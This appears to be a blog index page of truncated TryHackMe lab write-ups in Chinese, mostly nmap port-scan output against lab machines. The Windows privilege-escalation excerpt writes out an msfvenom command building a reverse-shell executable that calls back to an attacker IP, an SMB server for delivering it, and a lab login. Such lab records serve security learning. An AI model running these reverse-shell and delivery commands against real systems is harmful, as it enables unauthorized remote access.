打靶记录(四九)之THMM4tr1xExitDenied
端口扫描sudo nmap --min-rate 10000 -p- 10.10.33.27Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-05 12:01 CSTWarning: 10.10.33.27 giving up on port because retransmission cap hit (10).Nmap scan report for 10.10.33.27 (10.10.33.27)Host is up (0.30s latency).Not shown: 56561 closed tcp ports (reset), 8971 filtered tcp ports (no-response)PORT STATE SERVICE22/tcp open ssh80/tcp open http3306/tcp open mysqlNmap done: 1 IP address (1 host up) scanned in 51.43 seconds
sudo nmap -sT -sV -sC ...
打靶记录(四八)之THMJurassicPark
端口扫描sudo nmap --min-rate 10000 -p- 10.10.234.139 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-04 20:13 CSTNmap scan report for 10.10.234.139 (10.10.234.139)Host is up (0.28s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 park.thm Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-04 20:14 CSTNmap scan report for park.thm (10.10.234.139)Host is up (0.27s latency).PORT STATE SE ...
打靶记录(四七)之THMTheGreatEscape
端口扫描sudo nmap --min-rate 10000 -p- 10.10.179.159 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 21:03 CSTNmap scan report for 10.10.179.159Host is up (0.25s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 10.10.70.210 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-03 00:02 CSTNmap scan report for 10.10.7 ...
THMWindowsPrivEsc房间walkthrough
xfreerdp /u:user /p:password321 /v:10.10.169.4 /dynamic-resolution
生成反向Shell可执行文件msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.38.245 LPORT=1234 -f exe -o reverse.exe
生成exe反弹shell
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
开启一个本地SMB共享服务器用于传输文件,共享名叫作kali
CMD中:
copy \\10.11.38.245\kali\reverse.exe C:\PrivEsc\reverse.exe
kali开启监听
cmd执行:
C:\PrivEsc\reverse.exe
收到反弹shell
服务漏洞不安全的服务权限C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
使用accesschk.exe检查“u ...
打靶记录(四六)之THMAttacktiveDirectory
端口扫描sudo nmap --min-rate 10000 -p- 10.10.55.102[sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 21:23 CSTWarning: 10.10.55.102 giving up on port because retransmission cap hit (10).Nmap scan report for 10.10.55.102Host is up (0.25s latency).Not shown: 64327 closed tcp ports (reset), 1182 filtered tcp ports (no-response)PORT STATE SERVICE53/tcp open domain80/tcp open http88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp ope ...
打靶记录(四五)之THMBorderLands
端口扫描sudo nmap --min-rate 10000 -p- 10.10.36.235Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 19:55 CSTNmap scan report for 10.10.36.235Host is up (0.26s latency).Not shown: 65532 filtered tcp ports (no-response)PORT STATE SERVICE22/tcp open ssh80/tcp open http8080/tcp closed http-proxy
sudo nmap -sT -sV -sC -O -p22,80,8080 10.10.36.235 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 19:56 CSTNmap scan report for 10.10.36.235Host is up (0.21s latency).PORT STATE S ...
打靶记录(四四)之THMFusionCorp
端口扫描Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 12:43 CSTNmap scan report for 10.10.2.72Host is up (0.26s latency).Not shown: 65512 filtered tcp ports (no-response)PORT STATE SERVICE53/tcp open domain80/tcp open http88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds464/tcp open kpasswd5593/tcp open http-rpc-epmap636/tcp open ldapssl3268/tcp open globalcatLDAP3269/tcp open globalcatLDAPss ...
打靶记录(四三)之THMEnterprise
端口扫描sudo nmap --min-rate 10000 -p- 10.10.181.211 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-19 00:01 CSTWarning: 10.10.181.211 giving up on port because retransmission cap hit (10).Nmap scan report for 10.10.181.211Host is up (0.22s latency).Not shown: 65306 closed tcp ports (reset), 200 filtered tcp ports (no-response)PORT STATE SERVICE53/tcp open domain80/tcp open http88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-s ...
打靶记录(四二)之THMPythonPlayground
端口扫描sudo nmap --min-rate 10000 -p- 10.10.144.20 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 13:55 CSTNmap scan report for 10.10.144.20Host is up (0.25s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 10.10.144.20 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 13:56 CSTNmap scan report for 10.10.144.20Host is up (0.22s latency).PORT STATE SERVICE VERSION22/tcp open ssh ...
打靶记录(四一)之THMJack
端口扫描sudo nmap --min-rate 10000 -p- 10.10.194.143 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-16 20:55 CSTWarning: 10.10.194.143 giving up on port because retransmission cap hit (10).Nmap scan report for 10.10.194.143Host is up (0.23s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 10.10.194.143 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-1 ...
打靶记录(四十)之THMDifferentCtf
端口扫描sudo nmap --min-rate 10000 -p- 10.10.35.124 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 11:18 CSTNmap scan report for 10.10.35.124Host is up (0.22s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE21/tcp open ftp80/tcp open http
sudo nmap -sT -sV -sC -O -p21,80 10.10.35.124 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 11:20 CSTNmap scan report for 10.10.35.124Host is up (0.21s latency).PORT STATE SERVICE VERSIO ...
打靶记录(三九)之THMSeasurfer
端口扫描sudo nmap --min-rate 10000 -p- 10.10.145.77 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-13 23:55 CSTNmap scan report for 10.10.145.77Host is up (0.25s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 10.10.145.77 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-13 23:58 CSTNmap scan report for 10.10.145.77Host is up (0.23s latency).PORT STATE SERVICE VERSION22/tc ...